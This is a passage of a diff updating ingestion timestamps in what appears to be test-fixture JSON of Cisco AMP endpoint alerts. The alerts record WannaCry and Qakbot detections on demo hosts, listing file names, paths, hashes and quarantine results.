Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3695,7 +3695,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764094300Z", + "ingested": "2021-12-14T14:40:45.520873812Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -3796,7 +3796,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764098800Z",
+ "ingested": "2021-12-14T14:40:45.520874264Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -3886,7 +3886,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764104Z",
+ "ingested": "2021-12-14T14:40:45.520874963Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -3972,7 +3972,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764110200Z",
+ "ingested": "2021-12-14T14:40:45.520875458Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -4071,7 +4071,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764116300Z",
+ "ingested": "2021-12-14T14:40:45.520875846Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -4174,7 +4174,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764122900Z",
+ "ingested": "2021-12-14T14:40:45.520876445Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -4244,7 +4244,7 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-12-09T13:35:39.764129Z",
+ "ingested": "2021-12-14T14:40:45.520876867Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
 "code": "553648130",
 "kind": "alert",
@@ -4300,7 +4300,7 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-12-09T13:35:39.764151Z",
+ "ingested": "2021-12-14T14:40:45.520877283Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
 "code": "553648130",
 "kind": "alert",
@@ -4364,7 +4364,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764178800Z",
+ "ingested": "2021-12-14T14:40:45.520877670Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "2164260893",
 "kind": "alert",
@@ -4440,7 +4440,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764184200Z",
+ "ingested": "2021-12-14T14:40:45.520878103Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "2164260893",
 "kind": "alert",
@@ -4516,7 +4516,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764190200Z",
+ "ingested": "2021-12-14T14:40:45.520878647Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "2164260893",
 "kind": "alert",
@@ -4598,7 +4598,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764196200Z",
+ "ingested": "2021-12-14T14:40:45.520879048Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "553648147",
 "kind": "alert",
@@ -4678,7 +4678,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764201Z",
+ "ingested": "2021-12-14T14:40:45.520879444Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "553648147",
 "kind": "alert",
@@ -4758,7 +4758,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764222200Z",
+ "ingested": "2021-12-14T14:40:45.520879833Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "553648147",
 "kind": "alert",
@@ -4832,7 +4832,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764226200Z",
+ "ingested": "2021-12-14T14:40:45.520880228Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "code": "2164260880",
 "kind": "alert",
@@ -4929,7 +4929,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764254100Z",
+ "ingested": "2021-12-14T14:40:45.520880675Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat 